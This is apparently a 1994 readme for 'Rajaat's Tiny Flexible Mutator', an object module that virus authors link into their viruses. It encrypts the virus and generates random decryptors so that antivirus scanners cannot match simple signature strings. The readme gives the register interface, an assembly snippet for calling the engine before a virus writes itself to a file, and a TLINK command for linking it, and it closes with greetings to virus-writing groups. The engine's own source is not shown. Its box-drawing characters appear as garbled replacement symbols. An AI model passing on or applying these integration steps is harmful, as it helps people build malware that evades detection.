101 lines
3.5 KiB
Plaintext
101 lines
3.5 KiB
Plaintext
|
|
|||
|
|
|
|||
|
|
Rajaat's Tiny Flexible Mutator [RTFM] <20>
|
|||
|
|
Version 1.0 <20>
|
|||
|
|
(C) 1994 Rajaat <20>
|
|||
|
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|
|||
|
|
|
|||
|
|
What is it? <20>
|
|||
|
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|
|||
|
|
RTFM is an object module that can be linked to your virus to make
|
|||
|
|
it impossible for a scanner to use a simple string. It will encrypt
|
|||
|
|
your virus and generates a random decryptor using random registers
|
|||
|
|
and random instructions. Therefore, an algorithmic approach will be
|
|||
|
|
needed to detect viruses using this object module.
|
|||
|
|
|
|||
|
|
How to use it <20>
|
|||
|
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|
|||
|
|
RTFM is very easy to use, and regular assembler users will have no
|
|||
|
|
problem using this routine. RTFM needs some input registers and will
|
|||
|
|
give some return values after processing.
|
|||
|
|
|
|||
|
|
Input <20>
|
|||
|
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|
|||
|
|
DS:SI = piece of code to encrypt
|
|||
|
|
ES:SI = place of decryptor+encrypted code
|
|||
|
|
CX = length of code (include the mutator (mut_len))
|
|||
|
|
BX = offset of decryptor in file
|
|||
|
|
AX = flag bits
|
|||
|
|
0 = 1 do not use junk code
|
|||
|
|
|
|||
|
|
Output <20>
|
|||
|
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|
|||
|
|
DS:DX = place of decryptor+encrypted code
|
|||
|
|
CX = length of encrypted code+decryptor
|
|||
|
|
BP = preserved
|
|||
|
|
Other registers might be trashed
|
|||
|
|
|
|||
|
|
Put this at the start of your virus code <20>
|
|||
|
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|
|||
|
|
extrn mut_top:near, mut_bottom:near, mut_len:abs
|
|||
|
|
extrn rnd_init:near, rnd_get:near
|
|||
|
|
extrn mutate:near
|
|||
|
|
|
|||
|
|
Before writing the virus to a file, call the engine with these parameters <20>
|
|||
|
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|
|||
|
|
mov si,offset virusstart ; with non-resident virii
|
|||
|
|
; you will need a delta offset
|
|||
|
|
|
|||
|
|
mov di,offset workspace ; make sure you point this to
|
|||
|
|
; an area that has enough space
|
|||
|
|
; virus the virus (including
|
|||
|
|
; the mutation engine) and the
|
|||
|
|
; decryptor
|
|||
|
|
|
|||
|
|
mov cx,viruslength+mut_len ; the length of the virus (and
|
|||
|
|
; the length of the mutation
|
|||
|
|
; engine)
|
|||
|
|
|
|||
|
|
mov bx,absstart ; absolute start of the
|
|||
|
|
; decryptor
|
|||
|
|
|
|||
|
|
xor ax,ax ; no flags set
|
|||
|
|
|
|||
|
|
call mutate ; and mutate!
|
|||
|
|
|
|||
|
|
Linking the module <20>
|
|||
|
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|
|||
|
|
To link RTFM to your virus, use TLINK from Borland. Use the following
|
|||
|
|
syntax :
|
|||
|
|
|
|||
|
|
TLINK /T MYVIRUS+RME10
|
|||
|
|
|
|||
|
|
Notes <20>
|
|||
|
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|
|||
|
|
RTFM was not meant to make an unscannable virus, it's only purpose is
|
|||
|
|
to make string scanning impossible. The code generated by RTFM is by
|
|||
|
|
no means extremely polymorphic and it will not be very difficult to
|
|||
|
|
devise an algorithm to detect viruses using RTFM. The size of RTFM is
|
|||
|
|
smaller than 650 bytes. This is not too big.
|
|||
|
|
|
|||
|
|
History <20>
|
|||
|
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|
|||
|
|
1.0 initial version
|
|||
|
|
|
|||
|
|
Greetings <20>
|
|||
|
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|
|||
|
|
Omega [AD], NuKE, Phalcon/Skism, Immortal Riot, TridenT, VLAD, YAM,
|
|||
|
|
Trinity, Zerial, DNA and all other virus writers I forgot!
|
|||
|
|
|